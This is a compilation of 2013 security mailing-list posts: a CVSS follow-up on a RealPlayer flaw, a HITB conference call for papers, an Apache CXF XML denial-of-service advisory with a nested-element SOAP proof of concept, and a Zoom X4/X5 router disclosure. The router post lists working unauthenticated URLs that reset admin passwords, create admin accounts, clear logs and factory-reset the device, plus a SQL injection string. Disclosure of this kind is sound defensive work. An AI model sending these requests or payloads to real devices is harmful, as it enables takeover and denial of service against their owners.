Re: re: Real player resource exhaustion Vulnerability
Please find below updated Impact information ### CVSS Severity (version 2.0): CVSS v2 Base Score:4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 CVSS Version 2 Metrics: Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism Access Complexity: Medium Authentication: Not required to exploit Impact Type:Allows disruption of serviceUnknown ###
[HITB-Announce] REMINDER: #HITB2013KUL CFP Closes 25th July
Hi everyone, Just a gentle reminder that the Call for Papers for the 11th annual HITB Security Conference in Malaysia, #HITB2013KUL, closes on the 25th of July at 23:59 MYT! As always, we're looking for talks that are highly technical, but most importantly, material which is new, cutting edge and content that hasn't been seen before. HITB CFP: http://cfp.hackinthebox.org/ The conference takes place at the Intercontinental Kuala Lumpur on the 16th and 17th of October in a triple-track format with keynote speakers Joe Sullivan (Chief Security Officer for Facebook) and Andy Ellis (Chief Security Officer at Akamai). Alongside the main conference, there will also be an open to public lock picking village run by TOOOL, a technology showcase area/exhibition area, a 24-hour developer hackathon (HackWEEKDAY) and of course a team-based Capture The Flag competition! Event Website: http://conference.hitb.org/ === Each accepted submission will entitle the speaker(s) to accommodation for 3 nights / 4 days and travel expense reimbursement up to EUR1200.00 per speaking slot. Topics of interest include, but are not limited to the following: Cloud Security File System Security 3G/4G/WIMAX Security SS7/GSM/VoIP Security Security of Medical Devices Critical Infrastructure Security Smartphone / MobileSecurity Smart Card and Physical Security Network Protocols, Analysis and Attacks Applications of Cryptographic Techniques Side Channel Analysis of Hardware Devices Analysis of Malicious Code / Viruses / Malware Data Recovery, Forensics and Incident Response Hardware based attacks and reverse engineering Windows / Linux / OS X / *NIX Security Vulnerabilities Next Generation Exploit and Exploit Mitigation Techniques NFC, WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security WHITE PAPER: If your presentation is short listed for inclusion into the conference program, a technical white paper must also be provided for review (3000 - 5000 words). Your submissions will be reviewed by The HITB CFP Review Committee: Charlie Miller (formerly Principal Research Consultant, Accuvant Labs) Katie Moussouris, Senior Security Strategist, Microsoft Itzik Kotler, Chief Technology Officer, Security Art Cesar Cerrudo, Chief Technology Officer, IOActive Jeremiah Grossman, Founder, Whitehat Security Andrew Cushman, Senior Director, Microsoft Saumil Shah, Founder CEO Net-Square Thanh 'RD' Nguyen, THC, VNSECURITY Alexander Kornburst, Red Database Fredric Raynal, QuarksLab Shreeraj Shah, Founder, BlueInfy Emmanuel Gadaix, Founder, TSTF Andrea Barisani, Inverse Path Philippe Langlois, TSTF Ed Skoudis, InGuardians Haroon Meer, Thinkst Chris Evans, Google Raoul Chiesa, TSTF/ISECOM rsnake, SecTheory Gal Diskin, Intel Skyper, THC Note: We do not accept product or vendor related pitches. If you would like to showcase your company's products or technology, please email conferencei...@hackinthebox.org See you in October! --- Hafez Kamal, HITB Conference Core Crew (.MY), Hack in The Box (M) Sdn. Bhd. 36th Floor, Menara Maxis, Kuala Lumpur City Centre, 50088 Kuala Lumpur, Malaysia Tel: +603-26157299 Fax: +603-26150088 PGP Key ID: 0xC0DC7DF8
SEC Consult SA-20130709-0 :: Denial of service vulnerability in Apache CXF
SEC Consult Vulnerability Lab Security Advisory 20130709-0 === title: Denial of service vulnerability product: Apache CXF vulnerable version: Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 fixed version: Apache CXF 2.5.10, 2.6.7 and 2.7.4 onwards CVE number: CVE-2013-2160 impact: Critical homepage: http://cxf.apache.org/ found: 2013-02-01 by: Andreas Falkenberg, SEC Consult Vulnerability Lab Christian Mainka, Ruhr-University Bochum Juraj Somorovsky, Ruhr-University Bochum Joerg Schwenk, Ruhr-University Bochum https://www.sec-consult.com === Vendor/product description: -- Apache CXF is an open source services framework. CXF helps you build and develop services using frontend programming APIs, like JAX-WS and JAX-RS. These services can speak a variety of protocols such as SOAP, XML/HTTP, RESTful HTTP, or CORBA and work over a variety of transports such as HTTP, JMS or JBI. URL: http://cxf.apache.org/ Business recommendation: -- Various denial of service attack vectors were found within Apache CXF. The recommendation of SEC Consult is to immediately perform an update. Vulnerability overview/description: -- It is possible to execute Denial of Service attacks on Apache CXF, exploiting the fact that the streaming XML parser does not put limits on things like the number of elements, number of attributes, the nested structure of the document received, etc. The effects of these attacks can vary from causing high CPU usage, to causing the JVM to run out of memory. URL: http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc Proof of concept: -- The following SOAP message will trigger a denial of service: ?xml version=1.0? soap:Envelope xmlns:soap=http://www.w3.org/2003/05/soap-envelope; soap:Body element element element element [thousands more] /element /element /element /element /soap:Body /soap:Envelope There are various other XML payloads that will also trigger a denial of service on vulnerable services. Vulnerable / tested versions: -- This vulnerability affects all versions of Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4. Vendor contact timeline: -- 2013-02-22: Advisory sent to vendor by Juraj Somorovsky (RUB) 2013-02-22: Advisory acknowledged by vendor 2013-04-19: Vendor confirms vulnerability 2013-05-15: Vendor publishes fixed version 2013-06-27: Vulnerability is disclosed by vendor 2013-07-09: SEC Consult releases security advisory Solution: -- CXF 2.5.x users should upgrade to 2.5.10 or later as soon as possible. CXF 2.6.x users should upgrade to 2.6.7 or later as soon as possible. CXF 2.7.x users should upgrade to 2.7.4 or later as soon as possible. Also see the advisory of the vendor: http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc Workaround: -- No workaround available. Advisory URL: -- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Andreas Falkenberg / @2013
Re: re: Real player resource exhaustion Vulnerability
On Tue, Jul 09, 2013 at 07:17:35AM +, akshay.vagh...@cyberoam.com wrote: Impact Type:Allows disruption of serviceUnknown Unknown? --- Henri Salo signature.asc Description: Digital signature
Zoom X4/X5 ADSL Modem and Router -Unauthenticated Remote Root Command Execution
Vulnerable Products - Zoom X4 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions Zoom X5 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions Note: A similar vulnerability was reported several years ago on the Zoom X3 ADSL Modem using a SOAP API call. Many of these vulnerabilities affect X3 in the same manner, without needing to use a SOAP API. === Vulnerability- When UPnP services and WAN http administrative access are enabled, authorization and credential challenges can be bypassed by directly accessing root privileged abilities via a web browser URL. All aspects of the modem/router can be changed, altered and controlled by an attacker, including gaining access to and changing the PPPoe/PPP ISP credentials. Timeline with Vendor- Have had no response from Zoom Telephonics since first reporting the problem on June 28. Subsequent emails have been sent with no response. Root Cause Observed- -As in most IGD UPnP routers and modems, where root vulnerabilities are prevalent, these modems contain the same privileged tunnel between either side of the router to be traversed without authentication. The code and layout of the device plays a large role as well. Code/Script Vulnerabilities- -Form tags and actions ids usually hidden are easily seen from the html source, no sanitization of client side input is occurring and root overrides such as 'Zadv=1' can be invoked by any user. -No cookie authentication is done once several of the first bypass is executed, allowing for Cookie: sessionId=invalid to pass admin commands. -The SQL injection UNION SELECT 1,2,3,4,5,6,7-- added to the end of any URL page calling a table value, such as /MainPage?id=25, will bring up the system status page, with each interface visible and selectable. Patches or Fixes- At this time, there are no known patches or fixes. Vulnerability proofs and examples- All administrative items can be accessed through these two URLs --Menu Banner http://IP/hag/pages/toc.htm -Advanced Options Menu http://IP/hag/pages/toolbox.htm Example commands that can be executed remotely through a web browser URL, or a modified HTTP GET/POST requests- -Change Password for admin Account On Firmware 2.5 or lower http://IP/hag/emweb/PopOutUserModify.htm/FormOneuser=adminex_param1=adminnew_pass1=123456new_pass2=123456id=3cmdSubmit=Save+Changes On Firmware 3.0- http://IP/hag/emweb/PopOutUserModify.htm?id=40user=adminZadv=1ex_param1=adminnew_pass1=123456new_pass2=123456id=3cmdSubmit=Save+Changes -Clear Logs http://IP/Action?id=76cmdClear+Log=Clear+Log -Remote Reboot to Default Factory Settings- Warning - For all intents and purposes, this action will almost always result in a long term Denial of Service attack. http://IP/Action?reboot_loc=1id=5cmdReboot=Reboot -Create New Admin or Intermediate Account- On Firmware 2.5 or lower http://IP/hag/emweb/PopOutUserAdd.htm?id=70user_id=newintermediateaccountpriv=v2pass1=123456pass2=123456cmdSubmit=Save+Changes On Firmware 3.0- http://IP/hag/emweb/PopOutUserAdd.htm?id=70Zadv=1ex_param1=adminuser_id=newadminaccountpriv=v1pass1=123456pass2=123456cmdSubmit=Save+Changes Mitigation and Workarounds- Adv.Options -- UPnP -- -- Disable UPnP -- Write Settings to Flash -- Reboot Adv.Options -- Firewall Configuration -- Enable 'Attack Protection' 'DOS Proctection''Black List'-- Write Settings to Flash Adv.Options -- Management Control -- Disable WAN Management from all fields -- Write Settings to Flash Always change the default Username and Password, though this will nothelp mitigate this vulnerability